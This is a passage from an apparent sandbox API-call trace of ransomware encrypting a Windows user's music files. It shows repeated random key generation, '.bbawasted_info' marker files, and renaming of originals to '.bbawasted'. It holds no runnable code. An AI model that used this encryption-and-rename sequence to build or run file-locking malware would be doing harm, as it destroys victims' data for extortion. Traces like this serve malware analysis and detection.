lpName=0x0) returned 0x11c [0074.239] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.240] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.240] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.240] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.241] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.241] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.249] SetEndOfFile (hFile=0x120) returned 1 [0074.251] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.251] CloseHandle (hObject=0x120) returned 1 [0074.253] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.253] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.254] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.254] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.254] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\X1wQvvTNsQ.mp3") returned 74 [0074.254] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29e) returned 0x5bf070 [0074.254] lstrcpyW (in: lpString1=0x5bf104, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.254] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.254] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.255] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.255] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\X1wQvvTNsQ.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\x1wqvvtnsq.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.255] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.256] SetEndOfFile (hFile=0x120) returned 1 [0074.256] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.256] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.256] lstrcpyW (in: lpString1=0x5bf104, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\X1wQvvTNsQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\x1wqvvtnsq.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\X1wQvvTNsQ.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\x1wqvvtnsq.mp3.bbawasted")) returned 1 [0074.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\X1wQvvTNsQ.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\x1wqvvtnsq.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.257] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.259] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.260] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.260] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.260] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.261] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.261] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.269] SetEndOfFile (hFile=0x120) returned 1 [0074.271] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.271] CloseHandle (hObject=0x120) returned 1 [0074.273] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.273] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.274] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.274] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.274] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\ydkIKruKT2XaL_.mp3") returned 78 [0074.274] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a6) returned 0x5bf070 [0074.274] lstrcpyW (in: lpString1=0x5bf10c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.274] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.274] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.274] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.274] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\ydkIKruKT2XaL_.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\ydkikrukt2xal_.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.277] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.278] SetEndOfFile (hFile=0x120) returned 1 [0074.279] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.279] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.279] lstrcpyW (in: lpString1=0x5bf10c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.279] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\ydkIKruKT2XaL_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\ydkikrukt2xal_.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\ydkIKruKT2XaL_.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\ydkikrukt2xal_.mp3.bbawasted")) returned 1 [0074.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\ydkIKruKT2XaL_.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\ydkikrukt2xal_.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.280] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0074.282] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.283] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.283] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.283] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.284] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.284] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.292] SetEndOfFile (hFile=0x120) returned 1 [0074.294] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.294] CloseHandle (hObject=0x120) returned 1 [0074.296] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.296] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.297] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.297] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.297] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\yO 6_tbq6aJ1mqMm-SRc.mp3") returned 84 [0074.297] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b2) returned 0x5bf070 [0074.297] lstrcpyW (in: lpString1=0x5bf118, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.297] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.297] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.297] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.298] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\yO 6_tbq6aJ1mqMm-SRc.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\yo 6_tbq6aj1mqmm-src.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.298] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.299] SetEndOfFile (hFile=0x120) returned 1 [0074.299] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.299] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.299] lstrcpyW (in: lpString1=0x5bf118, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\yO 6_tbq6aJ1mqMm-SRc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\yo 6_tbq6aj1mqmm-src.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\yO 6_tbq6aJ1mqMm-SRc.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\yo 6_tbq6aj1mqmm-src.mp3.bbawasted")) returned 1 [0074.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\yO 6_tbq6aJ1mqMm-SRc.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\yo 6_tbq6aj1mqmm-src.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.300] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.302] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.303] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.303] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.303] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.304] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.304] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.313] SetEndOfFile (hFile=0x120) returned 1 [0074.315] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.315] CloseHandle (hObject=0x120) returned 1 [0074.317] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.317] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.318] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.318] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\zOBb s KguW34.wav") returned 77 [0074.318] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a4) returned 0x5bf070 [0074.318] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.318] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.318] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.319] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.319] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\zOBb s KguW34.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zobb s kguw34.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.320] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.321] SetEndOfFile (hFile=0x120) returned 1 [0074.321] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.321] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.321] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\zOBb s KguW34.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zobb s kguw34.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\zOBb s KguW34.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zobb s kguw34.wav.bbawasted")) returned 1 [0074.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\zOBb s KguW34.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zobb s kguw34.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.322] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0074.323] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.323] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.323] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.323] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.324] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.324] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.332] SetEndOfFile (hFile=0x120) returned 1 [0074.334] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.334] CloseHandle (hObject=0x120) returned 1 [0074.419] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.419] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.420] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.420] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\zP-p5o.m4a") returned 70 [0074.420] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x296) returned 0x5bf070 [0074.420] lstrcpyW (in: lpString1=0x5bf0fc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.420] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.420] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.421] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.421] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\zP-p5o.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zp-p5o.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.422] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.423] SetEndOfFile (hFile=0x120) returned 1 [0074.423] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.423] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.423] lstrcpyW (in: lpString1=0x5bf0fc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\zP-p5o.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zp-p5o.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\zP-p5o.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zp-p5o.m4a.bbawasted")) returned 1 [0074.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\zP-p5o.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zp-p5o.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.424] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.425] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.426] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.426] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.426] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.427] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.427] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.437] SetEndOfFile (hFile=0x120) returned 1 [0074.439] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.439] CloseHandle (hObject=0x120) returned 1 [0074.441] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.441] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.442] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.442] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.442] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\Zrl4qKnN7b P.wav") returned 76 [0074.442] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5bf070 [0074.442] lstrcpyW (in: lpString1=0x5bf108, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.442] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.442] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.442] CryptGenRandom 